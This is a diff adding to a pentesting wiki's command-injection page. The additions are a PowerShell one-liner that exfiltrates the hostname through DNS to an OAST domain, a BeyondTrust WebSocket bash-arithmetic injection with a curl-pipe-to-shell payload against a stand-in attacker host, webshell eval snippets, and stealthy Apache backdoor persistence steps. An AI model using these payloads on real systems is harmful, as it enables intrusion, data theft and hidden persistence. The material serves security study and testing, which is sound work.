HackTricks-wiki · carlospolop · Feb 20, 2026
diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md
@@ -116,6 +116,12 @@ Online tools to check for DNS based data exfiltration:
 - dnsbin.zhack.ca
 - pingb.in
 
+When egress is filtered, **hex-encode short IDs into DNS labels** (≤63 bytes per label). Example PowerShell one-liner that encodes the hostname and queries an OAST domain:
+
+```powershell
+$h=[System.BitConverter]::ToString([Text.Encoding]::UTF8.GetBytes($env:COMPUTERNAME)).Replace('-','');$labels=($h -split '(.{1,63})' | ? {$_});$d=($labels -join ".")+".oastify.com";nslookup $d
+```
+
 ### Filtering bypass
 
 #### Windows
@@ -206,6 +212,20 @@ Example payloads:
 
 Because these diagnostics are parsed by the JVM itself, no shell metacharacters are required and the command runs with the same integrity level as the launcher. Desktop IPC bugs that forward user-supplied JVM flags (see [Localhost WebSocket abuse](websocket-attacks.md#localhost-websocket-abuse--browser-port-discovery)) therefore translate directly into OS command execution.
 
+### Bash arithmetic evaluation via WebSocket handshake parameters
+
+Some WebSocket daemons parse client "version" fields (e.g., `remoteVersion` in **BeyondTrust thin-scc-wrapper**) with bash arithmetic `(( ... ))`/`let`. Bash expands command substitutions inside operands, so attacker-controlled values can execute **during the handshake** without auth.
+
+- **Primitive:** use a non-numeric operand with command substitution, e.g., `remoteVersion=a[$(id)]0` or `a[$(curl attacker/p.sh|sh)]0`; `$(...)` runs before the numeric compare.
+- **Delivery:** connect to the WS endpoint (e.g., `/nw` or `get_portal_info`) and send the crafted `remoteVersion`; the wrapper executes it as the service user.
+- **Validation bypass:** superficial “numeric only” checks still reach bash arithmetic unless strict integer parsing rejects expressions first.
+
+#### Post-exploitation patterns observed after thin-scc-wrapper RCE
+
+- **Ephemeral admin hash swap:** backup the admin DB hash, generate a known-password hash with the appliance hasher (e.g., `check_auth`), swap it briefly to login, then restore and delete helpers.
+- **Webshells with gated params and parseable output:** minimal guards like `if(isset($_GET['aaaa'])) eval($_POST['1']);`; multi-source shells read POST/GET/Cookie, `base64_decode` input, `eval()`, and wrap output with `echo "DQo="` before/after for China Chopper/AntSword parsing.
+- **Apache config STOMP persistence:** drop a password-protected backdoor (e.g., `file_save.php` checking `?vjwr=`), append a `Location` routing it to a chosen PHP-FPM socket (e.g., `/ns/tmp/php-fpm.sock`), restart Apache, then overwrite the config with the clean backup so disk artifacts look benign.
+
 ## PaperCut NG/MF SetupCompleted auth bypass -> print scripting RCE
 
 - Vulnerable NG/MF builds (e.g., 22.0.5 Build 63914) expose `/app?service=page/SetupCompleted`; browsing there and clicking **Login** returns a valid `JSESSIONID` without credentials (authentication bypass in the setup flow).
@@ -240,5 +260,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
 - [When WebSockets Lead to RCE in CurseForge](https://elliott.diy/blog/curseforge/)
 - [PaperCut NG/MF SetupCompleted auth bypass → print scripting RCE](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html)
 - [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py)
+- [Unit 42 – VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)](https://unit42.paloaltonetworks.com/beyondtrust-cve-2026-1731/)
 
 {{#include ../banners/hacktricks-training.md}}